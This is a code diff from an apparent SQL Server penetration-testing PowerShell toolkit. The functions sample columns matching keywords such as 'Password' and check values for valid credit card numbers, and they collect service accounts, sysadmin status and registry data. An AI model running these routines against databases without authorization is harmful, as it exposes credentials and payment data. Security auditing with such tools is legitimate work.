= "Don't output anything.")] - [switch]$NoOutput, - - [Parameter(Mandatory = $false, - HelpMessage = 'Number of records to sample.')] - [int]$SampleSize = 1, - - [Parameter(Mandatory = $false, - HelpMessage = 'Comma seperated list of keywords to search for.')] - [string]$Keywords = 'Password', - - [Parameter(Mandatory = $false, - HelpMessage = 'Database name to filter on.')] - [string]$DatabaseName, - - [Parameter(Mandatory = $false, - HelpMessage = 'Use Luhn formula to check if sample is a valid credit card.')] - [switch]$ValidateCC, - - [Parameter(Mandatory = $false, - HelpMessage = "Don't select tables from default databases.")] - [switch]$NoDefaults, - [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] [switch]$SuppressVerbose @@ -2841,20 +3521,7 @@ Function Get-SQLColumnSampleData Begin { # Table for output - $TblData = New-Object -TypeName System.Data.DataTable - $null = $TblData.Columns.Add('ComputerName') - $null = $TblData.Columns.Add('Instance') - $null = $TblData.Columns.Add('Database') - $null = $TblData.Columns.Add('Schema') - $null = $TblData.Columns.Add('Table') - $null = $TblData.Columns.Add('Column') - $null = $TblData.Columns.Add('Sample') - $null = $TblData.Columns.Add('RowCount') - - if($ValidateCC) - { - $null = $TblData.Columns.Add('IsCC') - } + $TblServerInfo = New-Object -TypeName System.Data.DataTable } Process @@ -2868,125 +3535,160 @@ Function Get-SQLColumnSampleData $Instance = $env:COMPUTERNAME } - # Test connection to server + # Test connection to instance $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { $_.Status -eq 'Accessible' } - if(-not $TestConnection) + if($TestConnection) { if( -not $SuppressVerbose) { - Write-Verbose -Message "$Instance : CONNECTION FAILED" + Write-Verbose -Message "$Instance : Connection Success." } - Return } else { if( -not $SuppressVerbose) { - Write-Verbose -Message "$Instance : START SEARCH DATA BY COLUMN" - Write-Verbose -Message "$Instance : - Connection Success." - Write-Verbose -Message "$Instance : - Searching for column names that match criteria..." - } - - if($NoDefaults) - { - # Search for columns - $Columns = Get-SQLColumn -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName $DatabaseName -ColumnNameSearch $Keywords -NoDefaults -SuppressVerbose - }else - { - $Columns = Get-SQLColumn -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName $DatabaseName -ColumnNameSearch $Keywords -SuppressVerbose + Write-Verbose -Message "$Instance : Connection Failed." } + return } - # Check if columns were found - if($Columns) - { - # List columns found - $Columns| - ForEach-Object -Process { - $sDatabaseName = $_.DatabaseName - $sSchemaName = $_.SchemaName - $sTableName = $_.TableName - $sColumnName = $_.ColumnName - $AffectedColumn = "[$sDatabaseName].[$sSchemaName].[$sTableName].[$sColumnName]" - $AffectedTable = "[$sDatabaseName].[$sSchemaName].[$sTableName]" - $Query = "USE $sDatabaseName; SELECT TOP $SampleSize [$sColumnName] FROM $AffectedTable WHERE [$sColumnName] is not null" - $QueryRowCount = "USE $sDatabaseName; SELECT count(CAST([$sColumnName] as VARCHAR(200))) as NumRows FROM $AffectedTable WHERE [$sColumnName] is not null" + # Get number of active sessions for server + $ActiveSessions = Get-SQLSession -Instance $Instance -Credential $Credential -Username $Username -Password $Password -SuppressVerbose | + Where-Object -FilterScript { + $_.SessionStatus -eq 'running' + } | + Measure-Object -Line | + Select-Object -Property Lines -ExpandProperty Lines - # Status user - if( -not $SuppressVerbose) - { - Write-Verbose -Message "$Instance : - Column match: $AffectedColumn" - Write-Verbose -Message "$Instance : - Selecting $SampleSize rows of data sample from column $AffectedColumn." - } + # Get sysadmin status + $IsSysadmin = Get-SQLSysadminCheck -Instance $Instance -Credential $Credential -Username $Username -Password $Password -SuppressVerbose | Select-Object -Property IsSysadmin -ExpandProperty IsSysadmin - # Get row count for column matches - $RowCount = Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query $QueryRowCount -SuppressVerbose | Select-Object -Property NumRows -ExpandProperty NumRows + if($IsSysadmin -eq 'Yes') + { + # Grab additional information if sysadmin + $SysadminSetup = " + -- Get machine type + DECLARE @MachineType SYSNAME + EXECUTE master.dbo.xp_regread + @rootkey = N'HKEY_LOCAL_MACHINE', + @key = N'SYSTEM\CurrentControlSet\Control\ProductOptions', + @value_name = N'ProductType', + @value = @MachineType output - # Get sample data - Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query $Query -SuppressVerbose | - Select-Object -ExpandProperty $sColumnName | - ForEach-Object -Process { - if($ValidateCC) - { - # Check if value is CC - $Value = 0 - if([uint64]::TryParse($_,[ref]$Value)) - { - $LuhnCheck = Test-IsLuhnValid $_ -ErrorAction SilentlyContinue - } - else - { - $LuhnCheck = 'False' - } + -- Get OS version + DECLARE @ProductName SYSNAME + EXECUTE master.dbo.xp_regread + @rootkey = N'HKEY_LOCAL_MACHINE', + @key = N'SOFTWARE\Microsoft\Windows NT\CurrentVersion', + @value_name = N'ProductName', + @value = @ProductName output" - # Add record - $null = $TblData.Rows.Add($ComputerName, $Instance, $sDatabaseName, $sSchemaName, $sTableName, $sColumnName, $_, $RowCount, $LuhnCheck) - } - else - { - # Add record - $null = $TblData.Rows.Add($ComputerName, $Instance, $sDatabaseName, $sSchemaName, $sTableName, $sColumnName, $_, $RowCount) - } - } - } + $SysadminQuery = ' @MachineType as [OsMachineType], + @ProductName as [OSVersionName],' } else { - if( -not $SuppressVerbose) - { - Write-Verbose -Message "$Instance : - No columns were found that matched the search." - } + $SysadminSetup = '' + $SysadminQuery = '' } - # Status User - if( -not $SuppressVerbose) - { - Write-Verbose -Message "$Instance : END SEARCH DATA BY COLUMN" - } + # Define Query + $Query = " -- Get SQL Server Information + + -- Get SQL Server Service Name and Path + DECLARE @SQLServerInstance varchar(250) + DECLARE @SQLServerServiceName varchar(250) + if @@SERVICENAME = 'MSSQLSERVER' + BEGIN + set @SQLServerInstance = 'SYSTEM\CurrentControlSet\Services\MSSQLSERVER' + set @SQLServerServiceName = 'MSSQLSERVER' + END + ELSE + BEGIN + set @SQLServerInstance = 'SYSTEM\CurrentControlSet\Services\MSSQL$'+cast(@@SERVICENAME as varchar(250)) + set @SQLServerServiceName = 'MSSQL$'+cast(@@SERVICENAME as varchar(250)) + END + + -- Get SQL Server Service Account + DECLARE @ServiceAccountName varchar(250) + EXECUTE master.dbo.xp_instance_regread + N'HKEY_LOCAL_MACHINE', @SQLServerInstance, + N'ObjectName',@ServiceAccountName OUTPUT, N'no_output' + + -- Get authentication mode + DECLARE @AuthenticationMode INT + EXEC master.dbo.xp_instance_regread N'HKEY_LOCAL_MACHINE', + N'Software\Microsoft\MSSQLServer\MSSQLServer', + N'LoginMode', @AuthenticationMode OUTPUT + + -- Get the forced encryption flag + BEGIN TRY + DECLARE @ForcedEncryption INT + EXEC master.dbo.xp_instance_regread N'HKEY_LOCAL_MACHINE', + N'SOFTWARE\MICROSOFT\Microsoft SQL Server\MSSQLServer\SuperSocketNetLib', + N'ForceEncryption', @ForcedEncryption OUTPUT + END TRY + BEGIN CATCH + END CATCH + + -- Grab additional information as sysadmin + $SysadminSetup + + -- Return server and version information + SELECT '$ComputerName' as [ComputerName], + @@servername as [Instance], + DEFAULT_DOMAIN() as [DomainName], + SERVERPROPERTY('processid') as ServiceProcessID, + @SQLServerServiceName as [ServiceName], + @ServiceAccountName as [ServiceAccount], + (SELECT CASE @AuthenticationMode + WHEN 1 THEN 'Windows Authentication' + WHEN 2 THEN 'Windows and SQL Server Authentication' + ELSE 'Unknown' + END) as [AuthenticationMode], + @ForcedEncryption as ForcedEncryption, + CASE SERVERPROPERTY('IsClustered') + WHEN 0 + THEN 'No' + ELSE 'Yes' + END as [Clustered], + SERVERPROPERTY('productversion') as [SQLServerVersionNumber], + SUBSTRING(@@VERSION, CHARINDEX('2', @@VERSION), 4) as [SQLServerMajorVersion], + serverproperty('Edition') as [SQLServerEdition], + SERVERPROPERTY('ProductLevel') AS [SQLServerServicePack], + SUBSTRING(@@VERSION, CHARINDEX('x', @@VERSION), 3) as [OSArchitecture], + $SysadminQuery + RIGHT(SUBSTRING(@@VERSION, CHARINDEX('Windows NT', @@VERSION), 14), 3) as [OsVersionNumber], + SYSTEM_USER as [Currentlogin], + '$IsSysadmin' as [IsSysadmin], + '$ActiveSessions' as [ActiveSessions]" + # Execute Query + $TblServerInfoTemp = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + + # Append as needed + $TblServerInfo = $TblServerInfo + $TblServerInfoTemp } End { # Return data - if ( -not $NoOutput) - { - Return $TblData - } + $TblServerInfo } } -# --------------------------------------- -# Get-SQLColumnSampleDataThreaded -# --------------------------------------- +# ---------------------------------- +# Get-SQLServerInfoThreaded +# ---------------------------------- # Author: Scott Sutherland -Function Get-SQLColumnSampleDataThreaded +Function Get-SQLServerInfoThreaded { <# .SYNOPSIS - Returns column information from target SQL Servers. Supports search by keywords, sampling data, and validating credit card numbers. + Returns basic server and user information from target SQL Servers. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password @@ -2995,87 +3697,52 @@ Function Get-SQLColumnSampleDataThreaded SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. - .PARAMETER DAC - Connect using Dedicated Admin Connection. - .PARAMETER $NoOutput - Don't output any sample data. - .PARAMETER SampleSize - Number of records to sample. - .PARAMETER Keywords - Comma seperated list of keywords to search for. - .PARAMETER DatabaseName - Database to filter on. - .PARAMETER NoDefaults - Don't show columns from default databases. - .PARAMETER ValidateCC - Use Luhn formula to check if sample is a valid credit card. - - .PARAMETER Threads - Number of concurrent host threads. + .PARAMETER Instance + Number of host threads. .EXAMPLE - PS C:\> Get-SQLColumnSampleDataThreaded -verbose -Instance SQLServer1\STANDARDDEV2014 -Keywords "account,credit,card" -SampleSize 5 -ValidateCC | ft -AutoSize - VERBOSE: SQLServer1\STANDARDDEV2014 : START SEARCH DATA BY COLUMN - VERBOSE: SQLServer1\STANDARDDEV2014 : CONNECTION SUCCESS - VERBOSE: SQLServer1\STANDARDDEV2014 : - Searching for column names that match criteria... - VERBOSE: SQLServer1\STANDARDDEV2014 : - Column match: [testdb].[dbo].[tracking].[card] - VERBOSE: SQLServer1\STANDARDDEV2014 : - Selecting 5 rows of data sample from column [testdb].[dbo].[tracking].[card]. - VERBOSE: SQLServer1\STANDARDDEV2014 : COMPLETED SEARCH DATA BY COLUMN + PS C:\> Get-SQLServerInfoThreaded -Instance SQLServer1\STANDARDDEV2014 - ComputerName Instance Database Schema Table Column Sample RowCount IsCC - ------------ -------- -------- ------ ----- ------ ------ -------- ---- - SQLServer1 SQLServer1\STANDARDDEV2014 testdb dbo tracking card 4111111111111111 2 True - SQLServer1 SQLServer1\STANDARDDEV2014 testdb dbo tracking card 41111111111ASDFD 2 False - .EXAMPLE - PS C:\> Get-SQLInstanceLocal | Get-SQLColumnSampleDataThreaded -Keywords "account,credit,card" -SampleSize 5 -ValidateCC -Threads 10 - #> + ComputerName : SQLServer1 + Instance : SQLServer1\STANDARDDEV2014 + DomainName : Domain + ServiceName : MSSQL$STANDARDDEV2014 + ServiceAccount : LocalSystem + AuthenticationMode : Windows and SQL Server Authentication + Clustered : No + SQLServerVersionNumber : 12.0.4213.0 + SQLServerMajorVersion : 2014 + SQLServerEdition : Developer Edition (64-bit) + SQLServerServicePack : SP1 + OSArchitecture : X64 + OsMachineType : WinNT + OSVersionName : Windows 8.1 Pro + OsVersionNumber : 6.3 + Currentlogin : Domain\MyUser + IsSysadmin : Yes + ActiveSessions : 1 + .EXAMPLE + PS C:\> Get-SQLInstanceLocal | Get-SQLServerInfoThreaded -Verbose -Threads 20 + #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, - ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, - ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, [Parameter(Mandatory = $false, - ValueFromPipelineByPropertyName = $true, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, - ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, - [Parameter(Mandatory = $false, - HelpMessage = "Don't output anything.")] - [string]$NoOutput, - - [Parameter(Mandatory = $false, - HelpMessage = 'Number of records to sample.')] - [int]$SampleSize = 1, - - [Parameter(Mandatory = $false, - HelpMessage = 'Comma seperated list of keywords to search for.')] - [string]$Keywords = 'Password', - - [Parameter(Mandatory = $false, - HelpMessage = 'Database name to filter on.')] - [string]$DatabaseName, - - [Parameter(Mandatory = $false, - HelpMessage = "Don't select tables from default databases.")] - [switch]$NoDefaults, - - [Parameter(Mandatory = $false, - HelpMessage = 'Use Luhn formula to check if sample is a valid credit card.')] - [switch]$ValidateCC, - [Parameter(Mandatory = $false, HelpMessage = 'Number of threads.')] [int]$Threads = 5, @@ -3087,21 +3754,26 @@ Function Get-SQLColumnSampleDataThreaded Begin { - # Table for output - $TblData = New-Object -TypeName System.Data.DataTable - $null = $TblData.Columns.Add('ComputerName') - $null = $TblData.Columns.Add('Instance') - $null = $TblData.Columns.Add('Database') - $null = $TblData.Columns.Add('Schema') - $null = $TblData.Columns.Add('Table') - $null = $TblData.Columns.Add('Column') - $null = $TblData.Columns.Add('Sample') - $null = $TblData.Columns.Add('RowCount') - - if($ValidateCC) - { - $null = $TblData.Columns.Add('IsCC') - } + # Setup data table for output + $TblServerInfo = New-Object -TypeName System.Data.DataTable + $null = $TblServerInfo.Columns.Add('ComputerName') + $null = $TblServerInfo.Columns.Add('Instance') + $null = $TblServerInfo.Columns.Add('DomainName') + $null = $TblServerInfo.Columns.Add('ServiceName') + $null = $TblServerInfo.Columns.Add('ServiceAccount') + $null = $TblServerInfo.Columns.Add('AuthenticationMode') + $null = $TblServerInfo.Columns.Add('Clustered') + $null = $TblServerInfo.Columns.Add('SQLServerVersionNumber') + $null = $TblServerInfo.Columns.Add('SQLServerMajorVersion') + $null = $TblServerInfo.Columns.Add('SQLServerEdition') + $null = $TblServerInfo.Columns.Add('SQLServerServicePack') + $null = $TblServerInfo.Columns.Add('OSArchitecture') + $null = $TblServerInfo.Columns.Add('OsMachineType') + $null = $TblServerInfo.Columns.Add('OSVersionName') + $null = $TblServerInfo.Columns.Add('OsVersionNumber') + $null = $TblServerInfo.Columns.Add('Currentlogin') + $null = $TblServerInfo.Columns.Add('IsSysadmin') + $null = $TblServerInfo.Columns.Add('ActiveSessions') # Setup data table for pipeline threading $PipelineItems = New-Object -TypeName System.Data.DataTable @@ -3134,7 +3806,6 @@ Function Get-SQLColumnSampleDataThreaded { # Define code to be multi-threaded $MyScriptBlock = { - # Set instance $Instance = $_.Instance # Parse computer name from the instance @@ -3146,150 +3817,210 @@ Function Get-SQLColumnSampleDataThreaded $Instance = $env:COMPUTERNAME } - # Test connection to server + # Test connection to instance $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { $_.Status -eq 'Accessible' } - if(-not $TestConnection) + if($TestConnection) { if( -not $SuppressVerbose) { - Write-Verbose -Message "$Instance : CONNECTION FAILED" + Write-Verbose -Message "$Instance : Connection Success." } - Return } else { if( -not $SuppressVerbose) { - Write-Verbose -Message "$Instance : START SEARCH DATA BY COLUMN" - Write-Verbose -Message "$Instance : - Connection Success." - Write-Verbose -Message "$Instance : - Searching for column names that match criteria..." - } - - if($NoDefaults) - { - # Search for columns - $Columns = Get-SQLColumn -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName $DatabaseName -ColumnNameSearch $Keywords -NoDefaults -SuppressVerbose - }else - { - $Columns = Get-SQLColumn -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName $DatabaseName -ColumnNameSearch $Keywords -SuppressVerbose + Write-Verbose -Message "$Instance : Connection Failed." } + return } - # Check if columns were found - if($Columns) - { - # List columns found - $Columns| - ForEach-Object -Process { - $sDatabaseName = $_.DatabaseName - $sSchemaName = $_.SchemaName - $sTableName = $_.TableName - $sColumnName = $_.ColumnName - $AffectedColumn = "[$sDatabaseName].[$sSchemaName].[$sTableName].[$sColumnName]" - $AffectedTable = "[$sDatabaseName].[$sSchemaName].[$sTableName]" - $Query = "USE $sDatabaseName; SELECT TOP $SampleSize [$sColumnName] FROM $AffectedTable WHERE [$sColumnName] is not null" - $QueryRowCount = "USE $sDatabaseName; SELECT count(CAST([$sColumnName] as VARCHAR(200))) as NumRows FROM $AffectedTable WHERE [$sColumnName] is not null" + # Get number of active sessions for server + $ActiveSessions = Get-SQLSession -Instance $Instance -Credential $Credential -Username $Username -Password $Password -SuppressVerbose | + Where-Object -FilterScript { + $_.SessionStatus -eq 'running' + } | + Measure-Object -Line | + Select-Object -Property Lines -ExpandProperty Lines - # Status user - if( -not $SuppressVerbose) - { - Write-Verbose -Message "$Instance : - Column match: $AffectedColumn" - Write-Verbose -Message "$Instance : - Selecting $SampleSize rows of data sample from column $AffectedColumn." - } + # Get sysadmin status + $IsSysadmin = Get-SQLSysadminCheck -Instance $Instance -Credential $Credential -Username $Username -Password $Password -SuppressVerbose | Select-Object -Property IsSysadmin -ExpandProperty IsSysadmin - # Get row count for column matches - $RowCount = Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query $QueryRowCount -SuppressVerbose | Select-Object -Property NumRows -ExpandProperty NumRows + if($IsSysadmin -eq 'Yes') + { + # Grab additional information if sysadmin + $SysadminSetup = " + -- Get machine type + DECLARE @MachineType SYSNAME + EXECUTE master.dbo.xp_regread + @rootkey = N'HKEY_LOCAL_MACHINE', + @key = N'SYSTEM\CurrentControlSet\Control\ProductOptions', + @value_name = N'ProductType', + @value = @MachineType output - # Get sample data - Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query $Query -SuppressVerbose | - Select-Object -ExpandProperty $sColumnName | - ForEach-Object -Process { - if($ValidateCC) - { - # Check if value is CC - $Value = 0 - if([uint64]::TryParse($_,[ref]$Value)) - { - $LuhnCheck = Test-IsLuhnValid $_ -ErrorAction SilentlyContinue - } - else - { - $LuhnCheck = 'False' - } + -- Get OS version + DECLARE @ProductName SYSNAME + EXECUTE master.dbo.xp_regread + @rootkey = N'HKEY_LOCAL_MACHINE', + @key = N'SOFTWARE\Microsoft\Windows NT\CurrentVersion', + @value_name = N'ProductName', + @value = @ProductName output" - # Add record - $null = $TblData.Rows.Add($ComputerName, $Instance, $sDatabaseName, $sSchemaName, $sTableName, $sColumnName, $_, $RowCount, $LuhnCheck) - } - else - { - # Add record - $null = $TblData.Rows.Add($ComputerName, $Instance, $sDatabaseName, $sSchemaName, $sTableName, $sColumnName, $_, $RowCount) - } - } - } + $SysadminQuery = ' @MachineType as [OsMachineType], + @ProductName as [OSVersionName],' } else { - if( -not $SuppressVerbose) - { - Write-Verbose -Message "$Instance : - No columns were found that matched the search." - } - } - - # Status User - if( -not $SuppressVerbose) - { - Write-Verbose -Message "$Instance : END SEARCH DATA BY COLUMN" + $SysadminSetup = '' + $SysadminQuery = '' } - } - # Run scriptblock using multi-threading - $PipelineItems | Invoke-Parallel -ScriptBlock $MyScriptBlock -ImportSessionFunctions -ImportVariables -Throttle $Threads -RunspaceTimeout 2 -Quiet -ErrorAction SilentlyContinue + # Define Query + $Query = " -- Get SQL Server Information - return $TblData - } -} + -- Get SQL Server Service Name and Path + DECLARE @SQLServerInstance varchar(250) + DECLARE @SQLServerServiceName varchar(250) + if @@SERVICENAME = 'MSSQLSERVER' + BEGIN + set @SQLServerInstance = 'SYSTEM\CurrentControlSet\Services\MSSQLSERVER' + set @SQLServerServiceName = 'MSSQLSERVER' + END + ELSE + BEGIN + set @SQLServerInstance = 'SYSTEM\CurrentControlSet\Services\MSSQL$'+cast(@@SERVICENAME as varchar(250)) + set @SQLServerServiceName = 'MSSQL$'+cast(@@SERVICENAME as varchar(250)) + END + -- Get SQL Server Service Account + DECLARE @ServiceaccountName varchar(250) + EXECUTE master.dbo.xp_instance_regread + N'HKEY_LOCAL_MACHINE', @SQLServerInstance, + N'ObjectName',@ServiceAccountName OUTPUT, N'no_output' -# ---------------------------------- -# Get-SQLDatabaseSchema -# ---------------------------------- -# Author: Scott Sutherland -Function Get-SQLDatabaseSchema -{ - <# - .SYNOPSIS - Returns schema information from target SQL Servers. - .PARAMETER Username - SQL Server or domain account to authenticate with. - .PARAMETER Password - SQL Server or domain account password to authenticate with. - .PARAMETER Credential - SQL Server credential. - .PARAMETER Instance - SQL Server instance to connection to. - .PARAMETER DAC - Connect using Dedicated Admin Connection. - .PARAMETER DatabaseName - Database name to filter for. - .PARAMETER SchemaName - Schema name to filter for. - .PARAMETER NoDefaults - Only show information for non default databases. + -- Get authentication mode + DECLARE @AuthenticationMode INT + EXEC master.dbo.xp_instance_regread N'HKEY_LOCAL_MACHINE', + N'Software\Microsoft\MSSQLServer\MSSQLServer', + N'LoginMode', @AuthenticationMode OUTPUT - .EXAMPLE - PS C:\> Get-SQLDatabaseSchema -Instance SQLServer1\STANDARDDEV2014 -DatabaseName testdb + -- Grab additional information as sysadmin + $SysadminSetup - ComputerName : SQLServer1 - Instance : SQLServer1\STANDARDDEV2014 - DatabaseName : testdb - SchemaName : db_accessadmin - SchemaOwner : db_accessadmin - [TRUNCATED] + -- Return server and version information + SELECT '$ComputerName' as [ComputerName], + @@servername as [Instance], + DEFAULT_DOMAIN() as [DomainName], + @SQLServerServiceName as [ServiceName], + @ServiceAccountName as [ServiceAccount], + (SELECT CASE @AuthenticationMode + WHEN 1 THEN 'Windows Authentication' + WHEN 2 THEN 'Windows and SQL Server Authentication' + ELSE 'Unknown' + END) as [AuthenticationMode], + CASE SERVERPROPERTY('IsClustered') + WHEN 0 + THEN 'No' + ELSE 'Yes' + END as [Clustered], + SERVERPROPERTY('productversion') as [SQLServerVersionNumber], + SUBSTRING(@@VERSION, CHARINDEX('2', @@VERSION), 4) as [SQLServerMajorVersion], + serverproperty('Edition') as [SQLServerEdition], + SERVERPROPERTY('ProductLevel') AS [SQLServerServicePack], + SUBSTRING(@@VERSION, CHARINDEX('x', @@VERSION), 3) as [OSArchitecture], + $SysadminQuery + RIGHT(SUBSTRING(@@VERSION, CHARINDEX('Windows NT', @@VERSION), 14), 3) as [OsVersionNumber], + SYSTEM_USER as [Currentlogin], + '$IsSysadmin' as [IsSysadmin], + '$ActiveSessions' as [ActiveSessions]" + # Execute Query + $TblServerInfoTemp = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + + # Append as needed + $TblServerInfoTemp | + ForEach-Object -Process { + # Add row + $null = $TblServerInfo.Rows.Add( + $_.ComputerName, + $_.Instance, + $_.DomainName, + $_.ServiceName, + $_.ServiceAccount, + $_.AuthenticationMode, + $_.Clustered, + $_.SQLServerVersionNumber, + $_.SQLServerMajorVersion, + $_.SQLServerEdition, + $_.SQLServerServicePack, + $_.OSArchitecture, + $_.OsMachineType, + $_.OSVersionName, + $_.OsVersionNumber, + $_.Currentlogin, + $_.IsSysadmin, + $_.ActiveSessions + ) + } + } + + # Run scriptblock using multi-threading + $PipelineItems | Invoke-Parallel -ScriptBlock $MyScriptBlock -ImportSessionFunctions -ImportVariables -Throttle $Threads -RunspaceTimeout 2 -Quiet -ErrorAction SilentlyContinue + + return $TblServerInfo + } +} + + +# ---------------------------------- +# Get-SQLDatabase +# ---------------------------------- +# Author: Scott Sutherland +Function Get-SQLDatabase +{ + <# + .SYNOPSIS + Returns database information from target SQL Servers. + .PARAMETER Username + SQL Server or domain account to authenticate with. + .PARAMETER Password + SQL Server or domain account password to authenticate with. + .PARAMETER Credential + SQL Server credential. + .PARAMETER Instance + SQL Server instance to connection to. + .PARAMETER DAC + Connect using Dedicated Admin Connection. + .PARAMETER DatabaseName + Database name to filter for. + .PARAMETER NoDefaults + Only select non default databases. + .PARAMETER HasAccess + Only select databases the current user has access to. + .PARAMETER SysAdminOnly + Only select databases owned by a sysadmin. .EXAMPLE - PS C:\> Get-SQLInstanceLocal | Get-SQLDatabaseSchema -Verbose + PS C:\> Get-SQLDatabase -Instance SQLServer1\STANDARDDEV2014 -NoDefaults -DatabaseName testdb + + ComputerName : SQLServer1 + Instance : SQLServer1\STANDARDDEV2014 + DatabaseId : 7 + DatabaseName : testdb + DatabaseOwner : sa + OwnerIsSysadmin : 1 + is_trustworthy_on : True + is_db_chaining_on : False + is_broker_enabled : True + is_encrypted : False + is_read_only : False + create_date : 4/13/2016 4:27:36 PM + recovery_model_desc : FULL + FileName : C:\Program Files\Microsoft SQL Server\MSSQL12.STANDARDDEV2014\MSSQL\DATA\testdb.mdf + DbSizeMb : 3.19 + has_dbaccess : 1 + .EXAMPLE + PS C:\> Get-SQLInstanceLocal | Get-SQLDatabase -Verbose #> [CmdletBinding()] Param( @@ -3312,18 +4043,22 @@ Function Get-SQLDatabaseSchema [string]$Instance, [Parameter(Mandatory = $false, + ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Database name.')] [string]$DatabaseName, [Parameter(Mandatory = $false, - ValueFromPipelineByPropertyName = $true, - HelpMessage = 'Schema name.')] - [string]$SchemaName, + HelpMessage = 'Only select non default databases.')] + [switch]$NoDefaults, [Parameter(Mandatory = $false, - HelpMessage = "Don't select tables from default databases.")] - [switch]$NoDefaults, + HelpMessage = 'Only select databases the current user has access to.')] + [switch]$HasAccess, + + [Parameter(Mandatory = $false, + HelpMessage = 'Only select databases owned by a sysadmin.')] + [switch]$SysAdminOnly, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] @@ -3332,17 +4067,64 @@ Function Get-SQLDatabaseSchema Begin { - # Table for output - $TblSchemas = New-Object -TypeName System.Data.DataTable + # Create data tables for output + $TblResults = New-Object -TypeName System.Data.DataTable + $TblDatabases = New-Object -TypeName System.Data.DataTable + $null = $TblDatabases.Columns.Add('ComputerName') + $null = $TblDatabases.Columns.Add('Instance') + $null = $TblDatabases.Columns.Add('DatabaseId') + $null = $TblDatabases.Columns.Add('DatabaseName') + $null = $TblDatabases.Columns.Add('DatabaseOwner') + $null = $TblDatabases.Columns.Add('OwnerIsSysadmin') + $null = $TblDatabases.Columns.Add('is_trustworthy_on') + $null = $TblDatabases.Columns.Add('is_db_chaining_on') + $null = $TblDatabases.Columns.Add('is_broker_enabled') + $null = $TblDatabases.Columns.Add('is_encrypted') + $null = $TblDatabases.Columns.Add('is_read_only') + $null = $TblDatabases.Columns.Add('create_date') + $null = $TblDatabases.Columns.Add('recovery_model_desc') + $null = $TblDatabases.Columns.Add('FileName') + $null = $TblDatabases.Columns.Add('DbSizeMb') + $null = $TblDatabases.Columns.Add('has_dbaccess') - # Setup schema filter - if($SchemaName) + # Setup database filter + if($DatabaseName) { - $SchemaNameFilter = " where schema_name like '%$SchemaName%'" + $DatabaseFilter = " and a.name like '$DatabaseName'" } else { - $SchemaNameFilter = '' + $DatabaseFilter = '' + } + + # Setup NoDefault filter + if($NoDefaults) + { + $NoDefaultsFilter = " and a.name not in ('master','tempdb','msdb','model')" + } + else + { + $NoDefaultsFilter = '' + } + + # Setup HasAccess filter + if($HasAccess) + { + $HasAccessFilter = ' and HAS_DBACCESS(a.name)=1' + } + else + { + $HasAccessFilter = '' + } + + # Setup owner is sysadmin filter + if($SysAdminOnly) + { + $SysAdminOnlyFilter = " and IS_SRVROLEMEMBER('sysadmin',SUSER_SNAME(a.owner_sid))=1" + } + else + { + $SysAdminOnlyFilter = '' } } @@ -3377,65 +4159,112 @@ Function Get-SQLDatabaseSchema return } - # Setup NoDefault filter - if($NoDefaults) + # Check version + $SQLVersionFull = Get-SQLServerInfo -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property SQLServerVersionNumber -ExpandProperty SQLServerVersionNumber + if($SQLVersionFull) { - # Get list of databases - $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName $DatabaseName -HasAccess -NoDefaults -SuppressVerbose + $SQLVersionShort = $SQLVersionFull.Split('.')[0] } - else + + # Base query + $QueryStart = " SELECT '$ComputerName' as [ComputerName], + '$Instance' as [Instance], + a.database_id as [DatabaseId], + a.name as [DatabaseName], + SUSER_SNAME(a.owner_sid) as [DatabaseOwner], + IS_SRVROLEMEMBER('sysadmin',SUSER_SNAME(a.owner_sid)) as [OwnerIsSysadmin], + a.is_trustworthy_on, + a.is_db_chaining_on," + + # Version specific columns + if([int]$SQLVersionShort -ge 10) { - # Get list of databases - $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName $DatabaseName -HasAccess -SuppressVerbose + $QueryVerSpec = ' + a.is_broker_enabled, + a.is_encrypted, + a.is_read_only,' } - # Get tables for each database - $TblDatabases | - ForEach-Object -Process { - # Get database name - $DbName = $_.DatabaseName + # Query end + $QueryEnd = ' + a.create_date, + a.recovery_model_desc, + b.filename as [FileName], + (SELECT CAST(SUM(size) * 8. / 1024 AS DECIMAL(8,2)) + from sys.master_files where name like a.name) as [DbSizeMb], + HAS_DBACCESS(a.name) as [has_dbaccess] + FROM [sys].[databases] a + INNER JOIN [sys].[sysdatabases] b ON a.database_id = b.dbid WHERE 1=1' - if( -not $SuppressVerbose) - { - Write-Verbose -Message "$Instance : Grabbing Schemas from the $DbName database..." - } + # User defined filters + $Filters = " + $DatabaseFilter + $NoDefaultsFilter + $HasAccessFilter + $SysAdminOnlyFilter + ORDER BY a.database_id" 